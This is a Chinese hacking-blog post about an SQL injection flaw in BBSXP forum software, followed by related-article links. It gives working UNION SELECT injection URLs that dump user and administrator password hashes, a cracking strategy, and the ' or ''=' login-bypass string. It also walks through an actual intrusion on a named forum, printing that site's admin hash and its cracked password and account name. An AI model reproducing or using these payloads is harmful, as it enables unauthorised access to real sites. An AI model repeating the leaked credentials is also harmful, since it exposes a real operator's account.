BBSXP最新漏洞 简单注入检测 万能密码
BBSXP最新漏洞
漏洞日期:2005年7月1日
受害版本:目前所有BBSXP
漏洞利用:
查前台密码注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台密码注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5
首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞
漏洞主要出在BLOG.ASP 可以让直接构造数据库命令
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
后台区长的md5密码就显示出来了。
前台密码也可以出来,
网上已经有相关动画,软件。
就利用这个漏洞,肯定有一批bbsxp的网站要倒下了
接下来就是讲工具了,准备好MD5密码破解器
关于md5的破解,比较好使的有md5cracker速度增强版。
1。先用8位或9位数字跑。很快。
2。如果不行,用小写字母跑。选择5-6位比较好。
3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的,
跑上及几个小时。(你的机器配置必须很好)
4。再不行,建议放弃,太变态了。
前台ok...后台密码..(注:你必须知道管理员的帐号)
直接默认的配置就是直接拿下后台密码...
直接吧前台md5密码暴出来。
剩下的事就事破解md5了。
现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作
按照上面工具的介绍先用数字把,
正在破===耐心等等
我接条信息,大家不介意把~
出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。
bBsxp5.15最新漏洞的原始作者不清
74D2710BD75C06A057E842C8CA55C576
名'or''='密码也是'or''='
'
一般ASP系统都有类似下面的URL:http://www.xxx.com/xxx.ASP?ID=××,我们只往在这样的URL后加上一个单引号,如果返回服务器错误信息,那么就说明了程序并没有过滤单引号,而且从返回的错误信息中的了可以得到服务器的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
and 1=1、http:/www.xxx.com/xx.asp?id=×× and
1=2,如果返回的页面不一样,说明页面可以注入。
BBSXP最新漏洞 简单注入检测 万能密码相关推荐
- BBSXP最新漏洞 简单注入检測 万能password
BBSXP最新漏洞 漏洞日期:2005年7月1日 受害版本号:眼下全部BBSXP 漏洞利用: 查前台password注入语句: blog.asp?id=1%20union%20select%201,1 ...
- SQL手工注入原理万能密码及默认密码登陆后台
SQL手工注入原理: 下面就是比较笨的方法了== 一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_ 在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...
- mysql登录框万能密码_Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]...
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可以 ...
- sql注入之万能密码总结
万能密码 万能密码原理 原验证登陆语句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '&q ...
- SQL注入与万能密码登录
今天的靶机是一个主要面向web应用程序的框架.更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入.我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜 ...
- php密码注入,php防止sql注入之万能密码以及防范
说什么叫sql注入呢? 就是在登录.注册.input中输入一些影响sql语句的代码 导致你的sql语句出现问题,比如说这个问题: select * from web_manage where user ...
- 1039家校通 万能密码绕过 CNVD-2020-31494
1039家校通 万能密码绕过 CNVD-2020-31494 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X041 万能密码登陆 ...
- PHP代码审计入门-万能密码入门分析
0x00 写在前面 从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前 ...
- Mysql漏洞注入——万能密码
web渗透指南教学竞赛靶场 进入资源后台管理,如图所示: 输入任意账号密码,出现弹窗提醒,如图所示: 在用户名处输入用户名如下代码块,填入任意密码,如图所示(万能密码): admin' or 1=1- ...
最新文章
- 公司内部 action调用持久层规范
- 设计模式之外观模式学习笔记
- Ubuntu利用Samba映射磁盘到Windows(转)
- 设备翻转时viewController调用的方法
- 我国火力发电站的大脑用上了国产系统
- Spring boot(六):如何优雅的使用mybatis
- Pyomo 优化建模
- MOGRE学习(三) Mogre的SceneNode及Entity
- ssrs批量权限管理_管理SSRS安全性并使用PowerShell自动化脚本
- webpack跨域问题记录
- nodejs在自然语言处理中的一些小应用
- 基于springboot+vue的旅游信息(旅游线路)网站(前后端分离)
- AbstractQueuedSynchronizer简单理解及介绍
- 十六、邮件发送 --【转发】本地安装易邮邮箱服务器并用foxmail 连接测试(一)
- Nmap端口扫描windows版
- 银行争夺又一万亿市场:汽车金融
- Geek 极客大挑战2021 web
- 上上下下左右左右BA
- 服务器两个内存为何只显示4g_win10系统插入2个4G内存条却只显示4G的解决方法
- Vue项目玩转Ueditor(百度富文本编辑器),解决图片需要上传服务器的问题,将图片转存base64字符串。